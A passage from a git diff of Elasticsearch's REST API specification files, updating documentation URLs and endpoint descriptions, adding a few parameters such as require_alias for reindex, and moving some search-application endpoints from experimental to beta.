"url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-hot-threads", + "description":"Get the hot threads for nodes" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json index a4cf6481c553f..5f33d6084c9ac 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.info.json @@ -1,8 +1,8 @@ { "nodes.info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-info.html", - "description":"Returns information about nodes in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-info", + "description":"Get node information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json index 777a62a7dc3af..adc2bf8c2f4d2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.reload_secure_settings.json @@ -1,8 +1,8 @@ { "nodes.reload_secure_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/secure-settings.html#reloadable-secure-settings", - "description":"Reloads secure settings." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-reload-secure-settings", + "description":"Reload the keystore on nodes in the cluster" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json index e3ae508b8b1ce..56ac9cce6ba80 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.stats.json @@ -1,8 +1,8 @@ { "nodes.stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-stats.html", - "description":"Returns statistical information about nodes in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-stats", + "description":"Get node statistics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json index 09aeaba8fec01..3620ad69af42c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/nodes.usage.json @@ -1,8 +1,8 @@ { "nodes.usage":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cluster-nodes-usage.html", - "description":"Returns low-level information about REST actions usage on nodes." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-nodes-usage", + "description":"Get feature usage information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json b/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json index 6f3d09c15c081..e06050283ca9a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/open_point_in_time.json @@ -1,8 +1,8 @@ { "open_point_in_time":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/point-in-time-api.html", - "description":"Open a point in time that can be used in subsequent searches" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-open-point-in-time", + "description":"Open a point in time" }, "stability":"stable", "visibility":"public", @@ -59,6 +59,11 @@ "allow_partial_search_results": { "type": "boolean", "description": "Specify whether to tolerate shards missing when creating the point-in-time, or otherwise throw an exception. (default: false)" + }, + "max_concurrent_shard_requests": { + "type": "number", + "description": "The number of concurrent shard requests per node executed concurrently when opening this point-in-time. This value should be used to limit the impact of opening the point-in-time on the cluster", + "default": 5 } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json index 6615f789623f8..99c9b19c27803 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ping.json @@ -1,8 +1,8 @@ { "ping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Returns whether the cluster is running." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cluster", + "description":"Ping the cluster" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json index 51e313178ecbe..390c950951516 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.flamegraph.json @@ -2,7 +2,7 @@ "profiling.flamegraph":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Extracts a UI-optimized structure to render flamegraphs from Universal Profiling." + "description":"Extracts a UI-optimized structure to render flamegraphs from Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json index 13d44dc61db13..5242ec630da61 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.stacktraces.json @@ -2,7 +2,7 @@ "profiling.stacktraces":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Extracts raw stacktrace information from Universal Profiling." + "description":"Extracts raw stacktrace information from Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json index 76296e1079be2..adc7c3d4f7355 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.status.json @@ -2,7 +2,7 @@ "profiling.status":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Returns basic information about the status of Universal Profiling." + "description":"Returns basic information about the status of Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json index 3b4db3abf2cca..3643f3b0268d1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/profiling.topn_functions.json @@ -2,7 +2,7 @@ "profiling.topn_functions":{ "documentation":{ "url":"https://www.elastic.co/guide/en/observability/current/universal-profiling.html", - "description":"Extracts a list of topN functions from Universal Profiling." 
+ "description":"Extracts a list of topN functions from Universal Profiling" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json b/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json index 29e951848ddd8..e300335770c31 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/put_script.json @@ -1,8 +1,8 @@ { "put_script":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/modules-scripting.html", - "description":"Creates or updates a script." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-put-script", + "description":"Create or update a script or search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json index 8a97dcd311237..49331c28a355a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_rule.json @@ -1,8 +1,8 @@ { "query_rules.delete_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-query-rule.html", - "description": "Deletes an individual query rule within a ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-delete-rule", + "description": "Delete a query rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json index 90144ca9f3cf5..c1c4a1537bedf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.delete_ruleset.json @@ -1,8 +1,8 @@ { "query_rules.delete_ruleset": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-query-ruleset.html", - "description": "Deletes a query ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-delete-ruleset", + "description": "Delete a query ruleset" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json index 681b68ab583d8..a24dea752459c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_rule.json @@ -1,8 +1,8 @@ { "query_rules.get_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-query-rule.html", - "description": "Returns the details about an individual query rule within a ruleset." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-get-rule", + "description": "Get a query rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json index 28268ea667b8c..cf89a9db50fb6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.get_ruleset.json @@ -1,8 +1,8 @@ { "query_rules.get_ruleset": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-query-ruleset.html", - "description": "Returns the details about a query ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-get-ruleset", + "description": "Get a query ruleset" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json index e3e98adedb147..cc4138f0a554d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.list_rulesets.json @@ -1,8 +1,8 @@ { "query_rules.list_rulesets": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-query-rulesets.html", - "description": "Lists query rulesets." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-list-rulesets", + "description": "Get all query rulesets" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json index 5cc21b4f3249c..c2fefafe842a6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_rule.json @@ -1,8 +1,8 @@ { "query_rules.put_rule": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-query-rule.html", - "description": "Creates or updates a query rule within a ruleset." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-put-rule", + "description": "Create or update a query rule" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json index 12cbccc6b7651..ae1b8efc3dd95 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.put_ruleset.json @@ -1,8 +1,8 @@ { "query_rules.put_ruleset": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-query-ruleset.html", - "description": "Creates or updates a query ruleset." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-put-ruleset", + "description": "Create or update a query ruleset" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json index c82b45771ac7f..82c236d57dbc7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/query_rules.test.json @@ -1,8 +1,8 @@ { "query_rules.test": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/test-query-ruleset.html", - "description": "Tests a query ruleset to identify the rules that would match input criteria" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-query-rules-test", + "description": "Test a query ruleset" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json index e7d40bbe3bdf0..b1f7567bc5938 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rank_eval.json @@ -1,8 +1,8 @@ { "rank_eval":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-rank-eval.html", - "description":"Allows to evaluate the quality of ranked search results over a set of typical search queries" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rank-eval", + "description":"Evaluate ranked search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json index f8038853e4731..ef420a4a16b45 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex.json @@ -1,8 +1,8 @@ { "reindex":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html", - "description":"Allows to copy documents from one index to another, optionally filtering the source\ndocuments by a query, changing the destination index settings, or fetching the\ndocuments from a remote cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex", + "description":"Reindex documents" }, "stability":"stable", "visibility":"public", @@ -57,6 +57,11 @@ "max_docs":{ "type":"number", "description":"Maximum number of documents to process (default: all documents)" + }, + "require_alias":{ + "type":"boolean", + "default":false, + "description":"When true, requires destination to be an alias." } }, "body":{ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json index f53157c36cc64..03cba3a7fa4a8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/reindex_rethrottle.json @@ -1,8 +1,8 @@ { "reindex_rethrottle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-reindex.html", - "description":"Changes the number of requests per second for a particular Reindex operation." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex", + "description":"Throttle a reindex operation" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json index 5a29c99612a75..8ecb065adc19f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/render_search_template.json @@ -1,8 +1,8 @@ { "render_search_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/render-search-template-api.html", - "description":"Allows to use the Mustache language to pre-render a search definition." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-render-search-template", + "description":"Render a search template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json index 0a60a10ed8315..fa82143228f12 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.delete_job.json @@ -1,8 +1,8 @@ { "rollup.delete_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-delete-job.html", - "description":"Deletes an existing rollup job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-delete-job", + "description":"Delete a rollup job" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json index e373c9f08bfd5..c15aee0ce06f4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_jobs.json @@ -1,8 +1,8 @@ { "rollup.get_jobs":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-get-job.html", - "description":"Retrieves the configuration, stats, and status of rollup jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-jobs", + "description":"Get rollup job information" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json index a72187f9ca926..cc3729ced3307 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_caps.json @@ -1,8 +1,8 @@ { "rollup.get_rollup_caps":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-get-rollup-caps.html", - "description":"Returns the capabilities of any rollup jobs that have been configured for a specific index or index pattern." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-rollup-caps", + "description":"Get the rollup job capabilities" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json index c0e81ff7abcf4..e0220773d8f1e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.get_rollup_index_caps.json @@ -1,8 +1,8 @@ { "rollup.get_rollup_index_caps":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-get-rollup-index-caps.html", - "description":"Returns the rollup capabilities of all jobs inside of a rollup index (e.g. the index where rollup data is stored)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-get-rollup-index-caps", + "description":"Get the rollup index capabilities" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json index 2ba845cfab506..f508d9cd5b153 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.put_job.json @@ -1,8 +1,8 @@ { "rollup.put_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-put-job.html", - "description":"Creates a rollup job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-put-job", + "description":"Create a rollup job" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json index dfd8c7dec5241..738bebe9df9e8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.rollup_search.json @@ -1,8 +1,8 @@ { "rollup.rollup_search":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-search.html", - "description":"Enables searching rolled-up data using the standard query DSL." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-rollup-search", + "description":"Search rolled-up data" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json index 85250cfcfcdcd..216f0c2909ffe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.start_job.json @@ -1,8 +1,8 @@ { "rollup.start_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-start-job.html", - "description":"Starts an existing, stopped rollup job." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-start-job", + "description":"Start rollup jobs" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json index f6405cc99eb02..6ba9d7dc822f8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/rollup.stop_job.json @@ -1,8 +1,8 @@ { "rollup.stop_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/rollup-stop-job.html", - "description":"Stops an existing, started rollup job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-rollup-stop-job", + "description":"Stop rollup jobs" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json b/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json index b26d31fb6c0ce..dd7ea1bc9970d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/scripts_painless_execute.json @@ -1,8 +1,8 @@ { "scripts_painless_execute":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/painless/master/painless-execute-api.html", - "description":"Allows an arbitrary script to be executed and a result to be returned" + "url":"https://www.elastic.co/docs/reference/scripting-languages/painless/painless-api-examples", + "description":"Run a script" }, "stability":"experimental", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json b/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json index 553ee83587198..b29a4fbc6db54 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/scroll.json @@ -1,8 +1,8 @@ { "scroll":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-request-body.html#request-body-search-scroll", - "description":"Allows to retrieve a large numbers of results from a single search request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-scroll", + "description":"Run a scrolling search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search.json index 25b4efd9c4c37..7e267342f23be 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search.json @@ -1,8 +1,8 @@ { "search":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/search-search.html", - "description":"Returns results matching a query." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search", + "description":"Run a search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json index 19bba8738c029..dee6b0f1faad9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete.json @@ -1,10 +1,10 @@ { "search_application.delete": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-search-application.html", - "description": "Deletes a search application." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete", + "description": "Delete a search application" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json index 77a99c4c5d836..41bf1bdb654e0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.delete_behavioral_analytics.json @@ -1,8 +1,8 @@ { "search_application.delete_behavioral_analytics": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-analytics-collection.html", - "description": "Delete a behavioral analytics collection." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete-behavioral-analytics", + "description": "Delete a behavioral analytics collection" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json index d91b2b2498eb7..9765d6b336f59 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get.json @@ -1,10 +1,10 @@ { "search_application.get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-search-application.html", - "description": "Returns the details about a search application." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get", + "description": "Get search application details" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json index c4d2edcf42fc2..dcc9b6a4e4e1a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.get_behavioral_analytics.json @@ -1,8 +1,8 @@ { "search_application.get_behavioral_analytics": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-analytics-collection.html", - "description": "Returns the existing behavioral analytics collections." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get-behavioral-analytics", + "description": "Get behavioral analytics collections" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json index 19e75a1b92dd9..67e53841a8478 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.list.json @@ -1,10 +1,10 @@ { "search_application.list": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/list-search-applications.html", - "description": "Returns the existing search applications." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get-behavioral-analytics", + "description": "Get search applications" }, - "stability": "experimental", + "stability": "beta", "visibility": "public", "headers": { "accept": [ diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json index b497c3b1314bc..2ab8f7dee7d09 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/search_application.post_behavioral_analytics_event.json @@ -1,8 +1,8 @@ { "search_application.post_behavioral_analytics_event": { "documentation": { - "url": "http://todo.com/tbd", - "description": "Creates a behavioral analytics event for existing collection." 
